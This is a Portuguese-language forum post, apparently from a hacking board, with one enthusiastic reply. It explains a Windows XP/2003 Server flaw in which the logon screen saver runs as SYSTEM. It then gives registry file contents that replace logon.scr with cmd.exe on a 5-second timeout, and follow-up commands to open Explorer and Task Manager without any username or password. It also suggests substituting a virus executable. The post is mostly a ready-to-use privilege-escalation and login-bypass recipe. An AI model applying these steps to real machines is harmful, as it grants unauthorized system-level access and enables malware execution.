Falha no Default Screen Saver dos Windows XP e 2003 Server

[Anonymous]

Bem galera, o Susam Pal descobriu uma falha no Windows XP e 2003 Server (que foi onde ele testou... mas deve funcionar em todos os Windows NT's) que permite execução de comandos no prompt quando não tiver ninguém logado...

É o seguinte, quando o pc está numa rede, ele dá aquela tela de log para vc por o nome de usuário e senha, se ninguém digitar nada em 10 minutos (default), ele entra na proteção de tela.

Esta proteção de tela roda sob a conta do sistema (leia o artigo que traduzi dum amigo meu sobre como elevar seus status de administrador para sistema).

O registro diz o seguinte sobre esta proteção de tela:

Código:

Code Select Expand

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="600"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="logon.scr"

Como podemos ver, a proteção de tela começa em 600 segundos ou 10 minutos e roda o logon.scr (*.scr é extensão de proteção de tela.).

A falha consiste no seguinte, o que acontece se modificarmos este logon.scr para vírus.exe ou cmd.exe? Exatamente, o vírus ou o prompt de comandos é executado.

Então se você puser:

Código:

Code Select Expand

Windows Registry Editor Version 5.00

[HKEY_USERS\.DEFAULT\Control Panel\Desktop]
"ScreenSaverIsSecure"="0"
"ScreenSaveTimeOut"="5"
"ScreenSaveActive"="1"
"SCRNSAVE.EXE"="cmd.exe"

Em 5 segundos, ao invés do Screen Saver ser executado, aparecerá o prompt do DOS. Agora digite explorer.exe e você terá o windows na rede para vc sem saber nenhum nome de usuário e senha...

Agora digite taskmgr e vc terá o gerenciador de processos para vc adicionar e retirar processos.

Abraços a todos

[Reeves]

very cool man!
^^
sou obrigado a testar!